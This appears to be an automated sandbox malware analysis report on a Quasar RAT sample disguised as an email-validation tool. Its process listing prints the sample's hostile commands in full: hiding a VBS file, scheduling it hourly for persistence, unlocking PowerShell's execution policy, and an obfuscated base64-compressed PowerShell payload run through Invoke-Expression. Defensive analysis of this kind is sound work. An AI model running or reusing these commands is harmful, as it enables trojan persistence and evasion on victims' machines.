Malware Analysis Report

2025-01-18 04:28

Sample ID 231202-r4madade77
Target debouncer_BulkValidEmail.bin
SHA256 575219def0a2cebd86b9123bb384d394e1940b38ba3c9a8af40dd49c6a12b4db
Tags
upx quasar office04 spyware trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

575219def0a2cebd86b9123bb384d394e1940b38ba3c9a8af40dd49c6a12b4db

Threat Level: Known bad

The file debouncer_BulkValidEmail.bin was found to be: Known bad.

Malicious Activity Summary

upx quasar office04 spyware trojan

Quasar RAT

Quasar payload

Blocklisted process makes network request

UPX packed file

Loads dropped DLL

Looks up external IP address via web service

Suspicious use of SetThreadContext

Unsigned PE

Program crash

Suspicious behavior: EnumeratesProcesses

Uses Task Scheduler COM API

Suspicious use of SetWindowsHookEx

Views/modifies file attributes

Creates scheduled task(s)

Suspicious behavior: CmdExeWriteProcessMemorySpam

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-12-02 14:44

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-12-02 14:44

Reported

2023-12-02 14:46

Platform

win7-20231025-en

Max time kernel

40s

Max time network

18s

Command Line

"C:\Users\Admin\AppData\Local\Temp\debouncer_BulkValidEmail.exe"

Signatures

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\debouncer_BulkValidEmail.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\debouncer_BulkValidEmail.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\debouncer_BulkValidEmail.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\debouncer_BulkValidEmail.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\debouncer_BulkValidEmail.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\debouncer_BulkValidEmail.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\debouncer_BulkValidEmail.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\debouncer_BulkValidEmail.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\debouncer_BulkValidEmail.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\debouncer_BulkValidEmail.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\debouncer_BulkValidEmail.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\debouncer_BulkValidEmail.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\debouncer_BulkValidEmail.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\debouncer_BulkValidEmail.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\debouncer_BulkValidEmail.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\debouncer_BulkValidEmail.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\debouncer_BulkValidEmail.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\debouncer_BulkValidEmail.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\debouncer_BulkValidEmail.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\debouncer_BulkValidEmail.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\debouncer_BulkValidEmail.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\debouncer_BulkValidEmail.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\debouncer_BulkValidEmail.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\debouncer_BulkValidEmail.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\debouncer_BulkValidEmail.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\debouncer_BulkValidEmail.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\debouncer_BulkValidEmail.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\debouncer_BulkValidEmail.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\debouncer_BulkValidEmail.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\debouncer_BulkValidEmail.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\debouncer_BulkValidEmail.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\debouncer_BulkValidEmail.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\debouncer_BulkValidEmail.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\debouncer_BulkValidEmail.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\debouncer_BulkValidEmail.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\debouncer_BulkValidEmail.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\debouncer_BulkValidEmail.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ifconfig.me N/A N/A
N/A ifconfig.me N/A N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A

Suspicious behavior: CmdExeWriteProcessMemorySpam

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2340 wrote to memory of 2504 N/A C:\Users\Admin\AppData\Local\Temp\debouncer_BulkValidEmail.exe C:\Users\Admin\AppData\Local\Temp\debouncer_BulkValidEmail.exe
PID 2340 wrote to memory of 2504 N/A C:\Users\Admin\AppData\Local\Temp\debouncer_BulkValidEmail.exe C:\Users\Admin\AppData\Local\Temp\debouncer_BulkValidEmail.exe
PID 2340 wrote to memory of 2504 N/A C:\Users\Admin\AppData\Local\Temp\debouncer_BulkValidEmail.exe C:\Users\Admin\AppData\Local\Temp\debouncer_BulkValidEmail.exe
PID 2504 wrote to memory of 2988 N/A C:\Users\Admin\AppData\Local\Temp\debouncer_BulkValidEmail.exe C:\Windows\system32\cmd.exe
PID 2504 wrote to memory of 2988 N/A C:\Users\Admin\AppData\Local\Temp\debouncer_BulkValidEmail.exe C:\Windows\system32\cmd.exe
PID 2504 wrote to memory of 2988 N/A C:\Users\Admin\AppData\Local\Temp\debouncer_BulkValidEmail.exe C:\Windows\system32\cmd.exe
PID 2988 wrote to memory of 2880 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 2988 wrote to memory of 2880 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 2988 wrote to memory of 2880 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 2504 wrote to memory of 332 N/A C:\Users\Admin\AppData\Local\Temp\debouncer_BulkValidEmail.exe C:\Windows\system32\cmd.exe
PID 2504 wrote to memory of 332 N/A C:\Users\Admin\AppData\Local\Temp\debouncer_BulkValidEmail.exe C:\Windows\system32\cmd.exe
PID 2504 wrote to memory of 332 N/A C:\Users\Admin\AppData\Local\Temp\debouncer_BulkValidEmail.exe C:\Windows\system32\cmd.exe
PID 332 wrote to memory of 1340 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 332 wrote to memory of 1340 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 332 wrote to memory of 1340 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 2504 wrote to memory of 1584 N/A C:\Users\Admin\AppData\Local\Temp\debouncer_BulkValidEmail.exe C:\Windows\system32\cmd.exe
PID 2504 wrote to memory of 1584 N/A C:\Users\Admin\AppData\Local\Temp\debouncer_BulkValidEmail.exe C:\Windows\system32\cmd.exe
PID 2504 wrote to memory of 1584 N/A C:\Users\Admin\AppData\Local\Temp\debouncer_BulkValidEmail.exe C:\Windows\system32\cmd.exe
PID 2504 wrote to memory of 1588 N/A C:\Users\Admin\AppData\Local\Temp\debouncer_BulkValidEmail.exe C:\Windows\system32\cmd.exe
PID 2504 wrote to memory of 1588 N/A C:\Users\Admin\AppData\Local\Temp\debouncer_BulkValidEmail.exe C:\Windows\system32\cmd.exe
PID 2504 wrote to memory of 1588 N/A C:\Users\Admin\AppData\Local\Temp\debouncer_BulkValidEmail.exe C:\Windows\system32\cmd.exe
PID 1584 wrote to memory of 1524 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1584 wrote to memory of 1524 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1584 wrote to memory of 1524 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1584 wrote to memory of 320 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1584 wrote to memory of 320 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1584 wrote to memory of 320 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1588 wrote to memory of 2024 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1588 wrote to memory of 2024 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1588 wrote to memory of 2024 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1588 wrote to memory of 2024 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2024 wrote to memory of 1792 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2024 wrote to memory of 1792 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2024 wrote to memory of 1792 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2024 wrote to memory of 1792 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2504 wrote to memory of 632 N/A C:\Users\Admin\AppData\Local\Temp\debouncer_BulkValidEmail.exe C:\Windows\system32\cmd.exe
PID 2504 wrote to memory of 632 N/A C:\Users\Admin\AppData\Local\Temp\debouncer_BulkValidEmail.exe C:\Windows\system32\cmd.exe
PID 2504 wrote to memory of 632 N/A C:\Users\Admin\AppData\Local\Temp\debouncer_BulkValidEmail.exe C:\Windows\system32\cmd.exe

Uses Task Scheduler COM API

persistence

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\debouncer_BulkValidEmail.exe

"C:\Users\Admin\AppData\Local\Temp\debouncer_BulkValidEmail.exe"

C:\Users\Admin\AppData\Local\Temp\debouncer_BulkValidEmail.exe

"C:\Users\Admin\AppData\Local\Temp\debouncer_BulkValidEmail.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "attrib +h "C:\Users\Admin\AppData\Roaming\WindowsAPIwsh\WindowsAPIwsh.vbs""

C:\Windows\system32\attrib.exe

attrib +h "C:\Users\Admin\AppData\Roaming\WindowsAPIwsh\WindowsAPIwsh.vbs"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "schtasks /create /tn WindowsAPIwsh /sc hourly /mo 1 /tr "C:\Users\Admin\AppData\Roaming\WindowsAPIwsh\WindowsAPIwsh.vbs" > NUL 2>&1"

C:\Windows\system32\schtasks.exe

schtasks /create /tn WindowsAPIwsh /sc hourly /mo 1 /tr "C:\Users\Admin\AppData\Roaming\WindowsAPIwsh\WindowsAPIwsh.vbs"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "cmd /C echo Y|powershell Set-ExecutionPolicy Unrestricted -Scope CurrentUser"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -Command "( NEW-oBjEct sYSteM.IO.ComPreSsioN.deFLATEsTREAm([SysTEM.iO.MeMORystREAm] [cONVERT]::fRoMBAsE64stRINg( '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') ,[iO.CoMprEssiOn.CoMpREssIoNMoDe]::dEComPresS)|FoReACH-ObjeCT{ NEW-oBjEct Io.sTReAmrEADEr( $_ , [SYsTeM.TEXT.eNcOdInG]::ASCII )}| ForEacH-objeCt {$_.ReadtoEnd( ) }) |. ( $PshOme[21]+$PsHOmE[34]+'x')""

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Set-ExecutionPolicy Unrestricted -Scope CurrentUser

C:\Windows\system32\cmd.exe

cmd /C echo Y

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -Command "( NEW-oBjEct sYSteM.IO.ComPreSsioN.deFLATEsTREAm([SysTEM.iO.MeMORystREAm] [cONVERT]::fRoMBAsE64stRINg( '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') ,[iO.CoMprEssiOn.CoMpREssIoNMoDe]::dEComPresS)|FoReACH-ObjeCT{ NEW-oBjEct Io.sTReAmrEADEr( $_ , [SYsTeM.TEXT.eNcOdInG]::ASCII )}| ForEacH-objeCt {$_.ReadtoEnd( ) }) |. ( $PshOme[21]+$PsHOmE[34]+'x')"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe

"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\rjppa7oq.cmdline"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c cls

Network

Country Destination Domain Proto
US 8.8.8.8:53 ifconfig.me udp
US 34.117.118.44:443 ifconfig.me tcp

Files

memory/2340-0-0x000000013F5B0000-0x000000013FBFE000-memory.dmp

memory/2340-1-0x000000013F5B0000-0x000000013FBFE000-memory.dmp

memory/2340-2-0x000000013F5B0000-0x000000013FBFE000-memory.dmp

memory/2340-3-0x000000013F5B0000-0x000000013FBFE000-memory.dmp

memory/2340-76-0x0000000003DD0000-0x000000000441E000-memory.dmp

memory/2504-77-0x000000013F5B0000-0x000000013FBFE000-memory.dmp

memory/2504-78-0x000000013F5B0000-0x000000013FBFE000-memory.dmp

memory/2504-79-0x000000013F5B0000-0x000000013FBFE000-memory.dmp

memory/2504-80-0x000000013F5B0000-0x000000013FBFE000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI23402\ucrtbase.dll

MD5 298e85be72551d0cdd9ed650587cfdc6
SHA1 5a82bcc324fb28a5147b4e879b937fb8a56b760c
SHA256 eb89af5911a60d892a685181c397d32b72c61dc2ad77dd45b8cac0fbb7602b84
SHA512 3fafea5ff0d0b4e07f6354c37b367ada4da1b607186690c732364518a93c3fd2f5004014c9c3d23dde28db87d1cb9ae1259cda68b9ba757db59a59d387ac4e02

\Users\Admin\AppData\Local\Temp\_MEI23402\ucrtbase.dll

MD5 298e85be72551d0cdd9ed650587cfdc6
SHA1 5a82bcc324fb28a5147b4e879b937fb8a56b760c
SHA256 eb89af5911a60d892a685181c397d32b72c61dc2ad77dd45b8cac0fbb7602b84
SHA512 3fafea5ff0d0b4e07f6354c37b367ada4da1b607186690c732364518a93c3fd2f5004014c9c3d23dde28db87d1cb9ae1259cda68b9ba757db59a59d387ac4e02

C:\Users\Admin\AppData\Local\Temp\_MEI23402\api-ms-win-core-localization-l1-2-0.dll

MD5 54d2f426bc91ecf321908d133b069b20
SHA1 78892ea2873091f016daa87d2c0070b6c917131f
SHA256 646b28a20208be68439d73efa21be59e12ed0a5fe9e63e5d3057ca7b84bc6641
SHA512 6b1b095d5e3cc3d5909ebda4846568234b9bc43784919731dd906b6fa62aa1fdf723ac0d18bca75d74616e2c54c82d1402cc8529d75cb1d7744f91622ac4ec06

C:\Users\Admin\AppData\Local\Temp\_MEI23402\api-ms-win-core-processthreads-l1-1-1.dll

MD5 d1b3cc23127884d9eff1940f5b98e7aa
SHA1 d1b108e9fce8fba1c648afaad458050165502878
SHA256 51a73fbfa2afe5e45962031618ec347aaa0857b11f3cf273f4c218354bfe70cb
SHA512 ee5e0d546190e8ba9884ab887d11bb18fc71d3878983b544cd9ab80b6dd18ad65e66fe49fe0f4b92cbc51992fb1c39de091cf789159625341a03f4911b968fa2

\Users\Admin\AppData\Local\Temp\_MEI23402\api-ms-win-core-localization-l1-2-0.dll

MD5 54d2f426bc91ecf321908d133b069b20
